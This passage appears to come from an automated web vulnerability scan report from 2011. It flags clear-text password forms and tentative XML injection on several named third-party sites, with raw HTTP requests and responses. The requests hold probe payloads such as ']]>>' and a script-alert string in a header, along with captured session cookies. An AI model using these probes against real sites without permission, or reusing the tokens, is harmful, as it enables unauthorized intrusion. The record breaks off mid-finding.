Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

10.3. http://www.greenhulk.net/forums/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</h2>
   
       <form class="block vbform" method="post" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">    
           <input type="hidden" name="do" value="login" />
...[SNIP]...
</label>
                       <input type="password" class="primary textbox" id="vb_login_password" name="vb_login_password" tabindex="1" />
                   </div>
...[SNIP]...

10.4. http://www.greenhulk.net/forums/register.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>

<form id="registerform" action="register.php?do=addmember" name="register" method="post" onsubmit="return verify_passwords(password, passwordconfirm);" class="vbform block">

   
   <h2 class="blockhead">
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="password" id="password" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="passwordconfirm" id="passwordconfirm" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...

10.5. http://www.greenhulk.net/forums/register.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

10.6. http://www.greenhulk.net/forums/showthread.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...

10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<!-- UC: Mini Signin -->
<form method="post" id="Form1" action="/UMS/Login.aspx" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)){document.getElementById('MiniSignIn_btnSubmit').click();return false;}} else {return true};">

<input type="hidden" id="formSource" name="formSource" value="MiniSignIn" />
...[SNIP]...
<div class="float-left"><input type="password" name="txtPassword" id="txtPassword" maxlength="40" tabindex="1002" class="minifield" /></div>
...[SNIP]...

10.8. http://www.japanator.com/elephant/login.phtml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="http://www.japanator.com/elephant/login.phtml" method="post">

<input type="hidden" name="back_to" value="">
...[SNIP]...
<br/>
   <input type="password" name="password">
</p>
...[SNIP]...

10.9. http://www.japanator.com/elephant/signup.phtml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="signup.phtml" method="post">

<input type="hidden" name="back_to" value="http://www.japanator.com/elephant/">
...[SNIP]...
<td><input type="password" name="password" value="">
<br>
...[SNIP]...
<td ><input type="password" name="password2" value="">
<br>
...[SNIP]...

10.10. http://www.mrsdash.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrsdash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af4qxtezlapjev55htmjv345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Pag
...[SNIP]...
<body id="sitemap">
   <form name="frmMain" method="post" action="/404iis.aspx?404;http://www.mrsdash.com:80/favicon.ico" id="frmMain">
<div>
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword" type="password" maxlength="25" id="cTopNav_txtPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       <label>
...[SNIP]...
</label>
                       <input name="cTopNav$txtConfirmPassword" type="password" maxlength="25" id="cTopNav_txtConfirmPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       
                       <div class="newsletter">
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword_logn" type="password" maxlength="25" id="cTopNav_txtPassword_logn" onkeydown="setEnterKey('.signinMem', event);" />

                       <p class="more">
...[SNIP]...

11. XML injection
There are 16 instances of this issue:


11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 02:04:13 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:44 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:18 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

